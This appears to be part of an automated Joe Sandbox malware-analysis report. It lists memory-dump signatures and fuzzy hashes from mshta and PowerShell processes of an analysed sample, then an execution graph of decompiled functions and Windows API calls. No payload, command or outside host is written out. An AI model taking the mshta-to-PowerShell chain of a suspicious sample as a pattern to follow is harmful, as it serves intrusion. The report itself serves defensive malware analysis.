                                                                      • Source File: 00000004.00000003.2269481383.000001D8F2B10000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001D8F2B10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_1d8f2b10000_mshta.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                      • Instruction ID: 5229feb56b359842a6560e38f794f34d761a42f5d4a601c44869e0ff65268492
                                                                      • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                      • Instruction Fuzzy Hash: 8190021449544699D41452910C8639C51406388290FD548815C16D0144D84D02961252
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.2269481383.000001D8F2B10000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001D8F2B10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_1d8f2b10000_mshta.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                      • Instruction ID: 5229feb56b359842a6560e38f794f34d761a42f5d4a601c44869e0ff65268492
                                                                      • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                      • Instruction Fuzzy Hash: 8190021449544699D41452910C8639C51406388290FD548815C16D0144D84D02961252
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000003.2269481383.000001D8F2B10000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001D8F2B10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_3_1d8f2b10000_mshta.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                      • Instruction ID: 5229feb56b359842a6560e38f794f34d761a42f5d4a601c44869e0ff65268492
                                                                      • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                      • Instruction Fuzzy Hash: 8190021449544699D41452910C8639C51406388290FD548815C16D0144D84D02961252
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2265479998.00007FF848640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848640000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3028b7955a23fe09d656161cc86970dbf5babe0f6b64ffee0f0d0f2be000ea9c
                                                                      • Instruction ID: 0c82720d2e0c044d5450430d8d7428df81f7e6bcf47bdcba9212462a77cc605d
                                                                      • Opcode Fuzzy Hash: 3028b7955a23fe09d656161cc86970dbf5babe0f6b64ffee0f0d0f2be000ea9c
                                                                      • Instruction Fuzzy Hash: 80423621D0FAC54FE79AAB28186A5B97BE0EF56A94F0801FBD44DC71D3DF089C068359
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2265479998.00007FF848640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848640000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @yH$@yH$@yH$P|H
                                                                      • API String ID: 0-1418896639
                                                                      • Opcode ID: d808b64ef77dafd9070dcf1ee44dacdcec28197c6b7e2f5aaec202986e6d4f9e
                                                                      • Instruction ID: 0be4436007133376cb7a43edc30983ff1315fa73b0bd41f9761e0f25d1d97ae5
                                                                      • Opcode Fuzzy Hash: d808b64ef77dafd9070dcf1ee44dacdcec28197c6b7e2f5aaec202986e6d4f9e
                                                                      • Instruction Fuzzy Hash: A9F14631E0EA894FE7D9EB28945A6783BE1EF15798F1801FAC44DC7193DF29AC058349
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2265479998.00007FF848640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848640000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @yH$@yH
                                                                      • API String ID: 0-403854902
                                                                      • Opcode ID: 31e818e7de8730dd2f6e1aff578dd9627d1d6e9ec4db7bd628f0985a3034f01f
                                                                      • Instruction ID: dc077ddf49164dc5b70f3222f18d0ae36895ab55f988e649ab995cf2de950b4c
                                                                      • Opcode Fuzzy Hash: 31e818e7de8730dd2f6e1aff578dd9627d1d6e9ec4db7bd628f0985a3034f01f
                                                                      • Instruction Fuzzy Hash: DB51E531E1EA8A4FE7D8EA18949A67877D2FF54658F1802BEC40DC3192CF28AC458749
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2265479998.00007FF848640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848640000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: U|H
                                                                      • API String ID: 0-3131380341
                                                                      • Opcode ID: 668acad2b97f47a192acb115af2f42c224a766e1f16be9064763e4b92e664d73
                                                                      • Instruction ID: 2f1c1539dac2618ff9080fd5515985a3d25a58ba7683a6c0c6f8d0c89ffc2235
                                                                      • Opcode Fuzzy Hash: 668acad2b97f47a192acb115af2f42c224a766e1f16be9064763e4b92e664d73
                                                                      • Instruction Fuzzy Hash: 17510712E0EA865FE3DAA73C18585787FE1EF56A90B0941FBC048CB2D7DE099C098359
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2265479998.00007FF848640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848640000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 898831d55fdcaa1be57f12398d9996b2be712b0f0cfd6c64d2ab88416d3ae05c
                                                                      • Instruction ID: c04b08638bac38b28a9e5a8d5cae0e75b60822441ee0eefe04598f14b32f9a22
                                                                      • Opcode Fuzzy Hash: 898831d55fdcaa1be57f12398d9996b2be712b0f0cfd6c64d2ab88416d3ae05c
                                                                      • Instruction Fuzzy Hash: 0041D322E1FE875FF6DAA628186A17C66D1EF45AE4F4801B9D80DC71D3EF0C9C05420E
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2264758375.00007FF848570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848570000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                      • Instruction ID: 00b717c92f1cf39c60fc60bb2780791a132f8e1f85d556d6651fcd22b4f6e9a6
                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                      • Instruction Fuzzy Hash: 2A01677111CB0C4FD748EF0CE451AA5B7E0FB95364F50056DE58AC3651D736E881CB45
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2265479998.00007FF848640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848640000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aee0b035bc0e4c649ab34b331863235dfeb183eef80a8cb21ea95a3c20da54c1
                                                                      • Instruction ID: 2fa4ba608914412de4bbfbb371cbf9f20dd5e527db1ae6663610f3a3d45b0f11
                                                                      • Opcode Fuzzy Hash: aee0b035bc0e4c649ab34b331863235dfeb183eef80a8cb21ea95a3c20da54c1
                                                                      • Instruction Fuzzy Hash: A7E0D833E0E9795FE7E6F95C241D1FCA691EF546A5B0501B7D90CC3142DE009C14438A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2265479998.00007FF848640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848640000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @P|H$-|H$-|H$-|H$-|H$U|H
                                                                      • API String ID: 0-1701889046
                                                                      • Opcode ID: 4a46931516cd0a2d74cddd38ad9c3615484e7136cab65496a2e66b8f161e9719
                                                                      • Instruction ID: 92f374bc527159676fb6dbb2bea1ea739419171eb6f2e76300ccce67686687a0
                                                                      • Opcode Fuzzy Hash: 4a46931516cd0a2d74cddd38ad9c3615484e7136cab65496a2e66b8f161e9719
                                                                      • Instruction Fuzzy Hash: C8F19031D0DA8A9FE799EB6C8859A687BE1FF65B40F1400BDC00DCB193DF29AC458749

                                                                      Execution Graph

                                                                      Execution Coverage:2.3%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:5.9%
                                                                      Total number of Nodes:1426
                                                                      Total number of Limit Nodes:40
                                                                      execution_graph 98268 7ff7c0eab221 98269 7ff7c0eab22a 98268->98269 98278 7ff7c0e60378 98268->98278 98291 7ff7c0ec47bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 98269->98291 98271 7ff7c0eab241 98292 7ff7c0ec4708 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 98271->98292 98273 7ff7c0eab264 98293 7ff7c0e63c20 98273->98293 98275 7ff7c0eab292 98282 7ff7c0e60405 98275->98282 98314 7ff7c0ee8d98 49 API calls Concurrency::wait 98275->98314 98285 7ff7c0e5f7b8 98278->98285 98279 7ff7c0eab2d9 Concurrency::wait 98279->98278 98315 7ff7c0ec47bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 98279->98315 98283 7ff7c0e6070a 98282->98283 98284 7ff7c0e5e0a8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98282->98284 98316 7ff7c0e5ee20 5 API calls Concurrency::wait 98282->98316 98284->98282 98289 7ff7c0e5f7d5 98285->98289 98286 7ff7c0e5f7de 98286->98282 98289->98286 98290 7ff7c0e5f7b8 4 API calls 98289->98290 98317 7ff7c0e59640 98289->98317 98320 7ff7c0e5e0a8 98289->98320 98290->98289 98291->98271 98292->98273 98295 7ff7c0e63c80 98293->98295 98294 7ff7c0eb05be 98296 7ff7c0eb05d1 98294->98296 98336 7ff7c0ed34e4 77 API calls 3 library calls 98294->98336 98295->98294 98298 7ff7c0e64aa9 98295->98298 98299 7ff7c0e64a8f 98295->98299 98300 7ff7c0e63dde 98295->98300 98302 7ff7c0e64fe7 98295->98302 98306 7ff7c0e5e0a8 4 API calls 98295->98306 98310 7ff7c0e59640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98295->98310 98311 7ff7c0e75114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98295->98311 98312 7ff7c0e74f0c 34 API calls __scrt_initialize_thread_safe_statics 98295->98312 98313 7ff7c0e750b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 98295->98313 98334 7ff7c0e65360 300 API calls Concurrency::wait 98295->98334 98335 7ff7c0ed34e4 77 API calls 3 library calls 98295->98335 98296->98275 98303 7ff7c0e5e0a8 4 API calls 98298->98303 98308 7ff7c0e64ac0 98298->98308 98299->98298 98304 7ff7c0eafefe 98299->98304 98299->98308 98300->98275 98305 7ff7c0e5e0a8 4 API calls 98302->98305 98303->98300 98307 7ff7c0e5e0a8 4 API calls 98304->98307 98305->98300 98306->98295 98307->98308 98308->98275 98310->98295 98311->98295 98312->98295 98313->98295 98314->98279 98315->98279 98316->98282 98324 7ff7c0e74c68 98317->98324 98319 7ff7c0e59663 98319->98289 98321 7ff7c0e5e0bb 98320->98321 98322 7ff7c0e5e0b6 98320->98322 98321->98289 98333 7ff7c0e5f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 98322->98333 98327 7ff7c0e74c2c 98324->98327 98325 7ff7c0e74c50 98325->98319 98327->98324 98327->98325 98330 7ff7c0e7925c EnterCriticalSection LeaveCriticalSection _invalid_parameter_noinfo 98327->98330 98331 7ff7c0e75600 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 98327->98331 98332 7ff7c0e75620 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 98327->98332 98330->98327 98332->98327 98333->98321 98334->98295 98335->98295 98336->98296 98337 7ff7c0e55dec 98338 7ff7c0e55df4 98337->98338 98339 7ff7c0e55e98 98338->98339 98340 7ff7c0e55e28 98338->98340 98370 7ff7c0e55e96 98338->98370 98344 7ff7c0e55e9e 98339->98344 98345 7ff7c0e9c229 98339->98345 98341 7ff7c0e55e35 98340->98341 98342 7ff7c0e55f21 PostQuitMessage 98340->98342 98346 7ff7c0e9c2af 98341->98346 98347 7ff7c0e55e40 98341->98347 98349 7ff7c0e55e7c 98342->98349 98343 7ff7c0e55e6b DefWindowProcW 98343->98349 98350 7ff7c0e55ecc SetTimer RegisterWindowMessageW 98344->98350 98351 7ff7c0e55ea5 98344->98351 98393 7ff7c0e6ede4 8 API calls 98345->98393 98405 7ff7c0eca40c 16 API calls __scrt_fastfail 98346->98405 98352 7ff7c0e55f2b 98347->98352 98353 7ff7c0e55e49 98347->98353 98350->98349 98354 7ff7c0e55efc CreatePopupMenu 98350->98354 98357 7ff7c0e55eae KillTimer 98351->98357 98358 7ff7c0e9c1b8 98351->98358 98383 7ff7c0e74610 98352->98383 98365 7ff7c0e55f0b 98353->98365 98366 7ff7c0e55e5f 98353->98366 98353->98370 98354->98349 98356 7ff7c0e9c255 98394 7ff7c0e72c44 47 API calls Concurrency::wait 98356->98394 98379 7ff7c0e55d88 98357->98379 98362 7ff7c0e9c1f7 MoveWindow 98358->98362 98363 7ff7c0e9c1bd 98358->98363 98359 7ff7c0e9c2c3 98359->98343 98359->98349 98362->98349 98367 7ff7c0e9c1c2 98363->98367 98368 7ff7c0e9c1e4 SetFocus 98363->98368 98391 7ff7c0e55f3c 26 API calls __scrt_fastfail 98365->98391 98366->98343 98376 7ff7c0e55d88 Shell_NotifyIconW 98366->98376 98367->98366 98372 7ff7c0e9c1cb 98367->98372 98368->98349 98370->98343 98392 7ff7c0e6ede4 8 API calls 98372->98392 98374 7ff7c0e55f1f 98374->98349 98377 7ff7c0e9c280 98376->98377 98395 7ff7c0e56258 98377->98395 98380 7ff7c0e55d99 __scrt_fastfail 98379->98380 98381 7ff7c0e55de4 98379->98381 98382 7ff7c0e55db8 Shell_NotifyIconW 98380->98382 98390 7ff7c0e57098 DeleteObject DestroyWindow Concurrency::wait 98381->98390 98382->98381 98384 7ff7c0e746db 98383->98384 98385 7ff7c0e7461a __scrt_fastfail 98383->98385 98384->98349 98406 7ff7c0e572c8 98385->98406 98387 7ff7c0e746a2 KillTimer SetTimer 98387->98384 98388 7ff7c0e74660 98388->98387 98389 7ff7c0ebaaa1 Shell_NotifyIconW 98388->98389 98389->98387 98390->98349 98391->98374 98392->98349 98393->98356 98394->98366 98396 7ff7c0e56287 __scrt_fastfail 98395->98396 98468 7ff7c0e561c4 98396->98468 98399 7ff7c0e5632d 98401 7ff7c0e5634e Shell_NotifyIconW 98399->98401 98402 7ff7c0e9c644 Shell_NotifyIconW 98399->98402 98403 7ff7c0e572c8 6 API calls 98401->98403 98404 7ff7c0e56365 98403->98404 98404->98370 98405->98359 98407 7ff7c0e573bc Concurrency::wait 98406->98407 98408 7ff7c0e572f4 98406->98408 98407->98388 98428 7ff7c0e598e8 98408->98428 98410 7ff7c0e57303 98411 7ff7c0e9cdfc LoadStringW 98410->98411 98412 7ff7c0e57310 98410->98412 98414 7ff7c0e9ce1e 98411->98414 98431 7ff7c0e57cf4 98412->98431 98416 7ff7c0e5e0a8 4 API calls 98414->98416 98415 7ff7c0e57324 98417 7ff7c0e9ce30 98415->98417 98418 7ff7c0e57336 98415->98418 98424 7ff7c0e5734f __scrt_fastfail wcscpy 98416->98424 98442 7ff7c0e57c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 98417->98442 98418->98414 98419 7ff7c0e57343 98418->98419 98441 7ff7c0e57c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 98419->98441 98422 7ff7c0e9ce3c 98422->98424 98443 7ff7c0e571f8 98422->98443 98426 7ff7c0e573a3 Shell_NotifyIconW 98424->98426 98425 7ff7c0e9ce63 98427 7ff7c0e571f8 4 API calls 98425->98427 98426->98407 98427->98424 98429 7ff7c0e74c68 4 API calls 98428->98429 98430 7ff7c0e59918 98429->98430 98430->98410 98432 7ff7c0e57d0d 98431->98432 98433 7ff7c0e9d2c8 98431->98433 98436 7ff7c0e57d24 98432->98436 98439 7ff7c0e57d51 98432->98439 98454 7ff7c0e5dda4 98433->98454 98435 7ff7c0e9d2d3 98453 7ff7c0e57e4c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98436->98453 98438 7ff7c0e57d2f memcpy_s 98438->98415 98439->98435 98440 7ff7c0e74c68 4 API calls 98439->98440 98440->98438 98441->98424 98442->98422 98444 7ff7c0e5721c 98443->98444 98447 7ff7c0e9cd0c 98443->98447 98445 7ff7c0e57274 98444->98445 98450 7ff7c0e9cd66 memcpy_s 98444->98450 98463 7ff7c0e5b960 98445->98463 98449 7ff7c0e74c68 4 API calls 98447->98449 98448 7ff7c0e57283 memcpy_s 98448->98425 98449->98450 98451 7ff7c0e74c68 4 API calls 98450->98451 98452 7ff7c0e9cdda memcpy_s 98451->98452 98453->98438 98455 7ff7c0e5ddc7 memcpy_s 98454->98455 98456 7ff7c0e5dda9 98454->98456 98455->98435 98456->98455 98458 7ff7c0e5a7c0 98456->98458 98459 7ff7c0e5a7ed 98458->98459 98460 7ff7c0e5a7dd memcpy_s 98458->98460 98461 7ff7c0e9e7da 98459->98461 98462 7ff7c0e74c68 4 API calls 98459->98462 98460->98455 98462->98460 98464 7ff7c0e5b981 98463->98464 98467 7ff7c0e5b976 memcpy_s 98463->98467 98465 7ff7c0e74c68 4 API calls 98464->98465 98466 7ff7c0e9ef2a 98464->98466 98465->98467 98467->98448 98469 7ff7c0e9c5f8 98468->98469 98470 7ff7c0e561e0 98468->98470 98469->98470 98471 7ff7c0e9c602 DestroyIcon 98469->98471 98470->98399 98472 7ff7c0ecad94 39 API calls wcsftime 98470->98472 98471->98470 98472->98399 98473 7ff7c0e78fac 98474 7ff7c0e7901c 98473->98474 98475 7ff7c0e78fd2 GetModuleHandleW 98473->98475 98490 7ff7c0e8b9bc EnterCriticalSection 98474->98490 98475->98474 98479 7ff7c0e78fdf 98475->98479 98477 7ff7c0e79026 98481 7ff7c0e790a0 98477->98481 98486 7ff7c0e8aa8c 30 API calls 98477->98486 98489 7ff7c0e790cb 98477->98489 98478 7ff7c0e8ba10 _isindst LeaveCriticalSection 98480 7ff7c0e790f0 98478->98480 98479->98474 98491 7ff7c0e79164 GetModuleHandleExW 98479->98491 98482 7ff7c0e790fc 98480->98482 98485 7ff7c0e79118 11 API calls 98480->98485 98483 7ff7c0e790b8 98481->98483 98488 7ff7c0e8ada4 75 API calls 98481->98488 98484 7ff7c0e8ada4 75 API calls 98483->98484 98484->98489 98485->98482 98486->98481 98488->98483 98489->98478 98492 7ff7c0e7918e GetProcAddress 98491->98492 98493 7ff7c0e791b5 98491->98493 98492->98493 98496 7ff7c0e791a8 98492->98496 98494 7ff7c0e791c5 98493->98494 98495 7ff7c0e791bf FreeLibrary 98493->98495 98494->98474 98495->98494 98496->98493 98497 7ff7c0eaf890 98506 7ff7c0e5e18c 98497->98506 98499 7ff7c0eaf8a9 98500 7ff7c0eaf915 Concurrency::wait 98499->98500 98512 7ff7c0e72ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98499->98512 98504 7ff7c0eb03e1 Concurrency::wait 98500->98504 98514 7ff7c0ed34e4 77 API calls 3 library calls 98500->98514 98502 7ff7c0eaf8f6 98502->98500 98513 7ff7c0ed1464 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98502->98513 98507 7ff7c0e5e1a7 98506->98507 98508 7ff7c0e5e1c2 98506->98508 98515 7ff7c0e5ee20 5 API calls Concurrency::wait 98507->98515 98510 7ff7c0e5e1af 98508->98510 98516 7ff7c0e5ee20 5 API calls Concurrency::wait 98508->98516 98510->98499 98512->98502 98514->98504 98515->98510 98516->98510 98517 7ff7c0e62bf8 98520 7ff7c0e5ed44 98517->98520 98519 7ff7c0e62c05 98521 7ff7c0e5ed75 98520->98521 98528 7ff7c0e5edcd 98520->98528 98522 7ff7c0e63c20 300 API calls 98521->98522 98521->98528 98524 7ff7c0e5eda8 98522->98524 98526 7ff7c0e5edfe 98524->98526 98529 7ff7c0e5ee20 5 API calls Concurrency::wait 98524->98529 98525 7ff7c0eaa636 98526->98519 98528->98526 98530 7ff7c0ed34e4 77 API calls 3 library calls 98528->98530 98529->98528 98530->98525 98531 7ff7c0e62c17 98534 7ff7c0e614a0 98531->98534 98533 7ff7c0e62c2a 98535 7ff7c0e614d3 98534->98535 98536 7ff7c0eabe31 98535->98536 98538 7ff7c0eabdd1 98535->98538 98539 7ff7c0eabdf2 98535->98539 98557 7ff7c0e614fa __scrt_fastfail 98535->98557 98582 7ff7c0ee8f48 300 API calls 3 library calls 98536->98582 98541 7ff7c0eabddb 98538->98541 98538->98557 98542 7ff7c0eabe19 98539->98542 98580 7ff7c0ee9a88 300 API calls 4 library calls 98539->98580 98579 7ff7c0ee9514 300 API calls 98541->98579 98581 7ff7c0ed34e4 77 API calls 3 library calls 98542->98581 98543 7ff7c0e61884 98570 7ff7c0e72130 45 API calls 98543->98570 98549 7ff7c0e61815 98549->98533 98551 7ff7c0e61898 98551->98533 98554 7ff7c0e72130 45 API calls 98554->98557 98557->98543 98557->98549 98557->98554 98558 7ff7c0e61a30 45 API calls 98557->98558 98559 7ff7c0e61799 98557->98559 98562 7ff7c0eabfe4 98557->98562 98563 7ff7c0e63c20 300 API calls 98557->98563 98566 7ff7c0e5e0a8 4 API calls 98557->98566 98569 7ff7c0e5ef9c 46 API calls 98557->98569 98571 7ff7c0e720d0 45 API calls 98557->98571 98572 7ff7c0e55af8 300 API calls 98557->98572 98573 7ff7c0e75114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98557->98573 98574 7ff7c0e735c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98557->98574 98575 7ff7c0e74f0c 34 API calls _onexit 98557->98575 98576 7ff7c0e750b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98557->98576 98577 7ff7c0e736c4 77 API calls 98557->98577 98578 7ff7c0e737dc 300 API calls 98557->98578 98583 7ff7c0e5ee20 5 API calls Concurrency::wait 98557->98583 98584 7ff7c0ebac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98557->98584 98558->98557 98559->98549 98586 7ff7c0ed34e4 77 API calls 3 library calls 98559->98586 98585 7ff7c0ee93a4 77 API calls 98562->98585 98563->98557 98566->98557 98569->98557 98570->98551 98571->98557 98572->98557 98574->98557 98575->98557 98577->98557 98578->98557 98579->98549 98580->98542 98581->98536 98582->98557 98583->98557 98584->98557 98585->98559 98586->98559 98587 7ff7c0eae263 98588 7ff7c0eae271 98587->98588 98606 7ff7c0e62680 98587->98606 98588->98588 98589 7ff7c0e62856 98590 7ff7c0e629c8 PeekMessageW 98590->98606 98591 7ff7c0e626da GetInputState 98591->98590 98591->98606 98593 7ff7c0ead181 TranslateAcceleratorW 98593->98606 98594 7ff7c0e62a33 PeekMessageW 98594->98606 98595 7ff7c0e62a1f TranslateMessage DispatchMessageW 98595->98594 98596 7ff7c0e628b9 timeGetTime 98596->98606 98597 7ff7c0ead2bb timeGetTime 98654 7ff7c0e72ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98597->98654 98603 7ff7c0e63c20 300 API calls 98603->98606 98604 7ff7c0ed34e4 77 API calls 98604->98606 98606->98589 98606->98590 98606->98591 98606->98593 98606->98594 98606->98595 98606->98596 98606->98597 98606->98603 98606->98604 98607 7ff7c0e62b70 98606->98607 98614 7ff7c0e666c0 98606->98614 98648 7ff7c0e72de8 98606->98648 98653 7ff7c0e62e30 300 API calls 2 library calls 98606->98653 98655 7ff7c0ed3a28 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98606->98655 98656 7ff7c0eea320 300 API calls Concurrency::wait 98606->98656 98608 7ff7c0e62b96 98607->98608 98610 7ff7c0e62ba9 98607->98610 98657 7ff7c0e62050 98608->98657 98677 7ff7c0ed34e4 77 API calls 3 library calls 98610->98677 98611 7ff7c0e62b9e 98611->98606 98613 7ff7c0eae55c 98639 7ff7c0e6673b memcpy_s Concurrency::wait 98614->98639 98615 7ff7c0eb1fac 98812 7ff7c0eeab30 300 API calls Concurrency::wait 98615->98812 98618 7ff7c0eb1fbe 98618->98606 98620 7ff7c0e66c0f 98621 7ff7c0e66c3d 98620->98621 98622 7ff7c0eb1fc9 98620->98622 98809 7ff7c0e5ee20 5 API calls Concurrency::wait 98621->98809 98813 7ff7c0ed34e4 77 API calls 3 library calls 98622->98813 98626 7ff7c0e66c4a 98810 7ff7c0e71fcc 300 API calls 98626->98810 98628 7ff7c0e66d40 9 API calls 98628->98639 98630 7ff7c0e74c68 4 API calls 98630->98639 98631 7ff7c0eb20c1 98640 7ff7c0e66b15 98631->98640 98816 7ff7c0ed34e4 77 API calls 3 library calls 98631->98816 98632 7ff7c0e66c78 98811 7ff7c0e6e8f4 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98632->98811 98635 7ff7c0e63c20 300 API calls 98635->98639 98636 7ff7c0eb2032 98814 7ff7c0ed34e4 77 API calls 3 library calls 98636->98814 98638 7ff7c0e5e0a8 4 API calls 98638->98639 98639->98615 98639->98620 98639->98622 98639->98626 98639->98628 98639->98630 98639->98631 98639->98632 98639->98635 98639->98636 98639->98638 98639->98640 98683 7ff7c0ed8ea0 98639->98683 98716 7ff7c0ed7e48 98639->98716 98750 7ff7c0ed8e98 98639->98750 98783 7ff7c0eef160 98639->98783 98788 7ff7c0ed5b80 98639->98788 98794 7ff7c0eef0ac 98639->98794 98797 7ff7c0ed63dc 98639->98797 98802 7ff7c0e75114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98639->98802 98803 7ff7c0e5ec00 98639->98803 98808 7ff7c0e750b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98639->98808 98815 7ff7c0ee8d98 49 API calls Concurrency::wait 98639->98815 98640->98606 98649 7ff7c0e72e0d 98648->98649 98651 7ff7c0e72e2a 98648->98651 98649->98606 98650 7ff7c0e72e5b IsDialogMessageW 98650->98649 98650->98651 98651->98649 98651->98650 98652 7ff7c0eb9d94 GetClassLongPtrW 98651->98652 98652->98650 98652->98651 98653->98606 98654->98606 98655->98606 98656->98606 98658 7ff7c0e63c20 300 API calls 98657->98658 98659 7ff7c0e620a8 98658->98659 98660 7ff7c0e6212d 98659->98660 98663 7ff7c0e62552 98659->98663 98668 7ff7c0e62244 98659->98668 98671 7ff7c0ead06f 98659->98671 98673 7ff7c0e623cb memcpy_s 98659->98673 98674 7ff7c0e622a5 memcpy_s 98659->98674 98660->98611 98662 7ff7c0ead08d 98665 7ff7c0e74c68 4 API calls 98663->98665 98664 7ff7c0ead036 98680 7ff7c0e5ee20 5 API calls Concurrency::wait 98664->98680 98665->98673 98667 7ff7c0e74c68 4 API calls 98667->98674 98668->98673 98678 7ff7c0e61ce4 301 API calls Concurrency::wait 98668->98678 98669 7ff7c0ead062 98681 7ff7c0e5ee20 5 API calls Concurrency::wait 98669->98681 98682 7ff7c0ed34e4 77 API calls 3 library calls 98671->98682 98673->98664 98676 7ff7c0ed34e4 77 API calls 98673->98676 98679 7ff7c0e54a60 300 API calls 98673->98679 98674->98667 98674->98673 98676->98673 98677->98613 98678->98674 98679->98673 98680->98669 98681->98671 98682->98662 98684 7ff7c0eda680 98683->98684 98692 7ff7c0eda71a 98684->98692 98854 7ff7c0e5834c 98684->98854 98686 7ff7c0eda6f3 98686->98639 98688 7ff7c0e5d4cc 48 API calls 98690 7ff7c0eda6d0 98688->98690 98689 7ff7c0eda7fd 98882 7ff7c0ed1864 6 API calls 98689->98882 98863 7ff7c0e56838 98690->98863 98692->98686 98692->98689 98696 7ff7c0eda770 98692->98696 98694 7ff7c0eda805 98883 7ff7c0ecb334 